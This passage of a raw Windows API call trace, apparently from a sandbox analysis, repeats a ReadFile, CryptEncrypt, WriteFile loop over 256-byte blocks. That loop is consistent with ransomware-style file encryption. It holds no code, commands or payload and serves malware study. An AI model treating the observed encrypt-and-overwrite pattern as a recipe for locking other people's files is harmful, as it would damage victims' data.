lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.448] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.448] GetLastError () returned 0x0 [0167.448] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.448] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.448] GetLastError () returned 0x0 [0167.448] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.449] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.449] GetLastError () returned 0x0 [0167.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.449] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.449] GetLastError () returned 0x0 [0167.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.449] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.449] GetLastError () returned 0x0 [0167.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.449] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.449] GetLastError () returned 0x0 [0167.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.449] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.449] GetLastError () returned 0x0 [0167.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.449] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.449] GetLastError () returned 0x0 [0167.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.449] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.449] GetLastError () returned 0x0 [0167.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.450] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.450] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.450] GetLastError () returned 0x0 [0167.450] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.450] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.450] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.450] GetLastError () returned 0x0 [0167.450] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.450] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.450] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.450] GetLastError () returned 0x0 [0167.450] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.450] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.450] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.450] GetLastError () returned 0x0 [0167.450] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.450] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.450] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.450] GetLastError () returned 0x0 [0167.450] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.450] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.450] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.450] GetLastError () returned 0x0 [0167.450] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.450] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.451] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.451] GetLastError () returned 0x0 [0167.451] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.451] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.451] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.451] GetLastError () returned 0x0 [0167.451] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.451] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.451] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.451] GetLastError () returned 0x0 [0167.451] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.451] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.451] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.451] GetLastError () returned 0x0 [0167.451] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.451] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.451] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.451] GetLastError () returned 0x0 [0167.451] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.451] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.451] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.451] GetLastError () returned 0x0 [0167.451] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.451] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.451] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.452] GetLastError () returned 0x0 [0167.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.452] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.452] GetLastError () returned 0x0 [0167.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.452] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.452] GetLastError () returned 0x0 [0167.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.452] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.452] GetLastError () returned 0x0 [0167.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.452] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.452] GetLastError () returned 0x0 [0167.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.452] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.452] GetLastError () returned 0x0 [0167.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.452] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.452] GetLastError () returned 0x0 [0167.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.453] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.453] GetLastError () returned 0x0 [0167.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.453] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.453] GetLastError () returned 0x0 [0167.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.453] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.453] GetLastError () returned 0x0 [0167.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.453] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.453] GetLastError () returned 0x0 [0167.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: 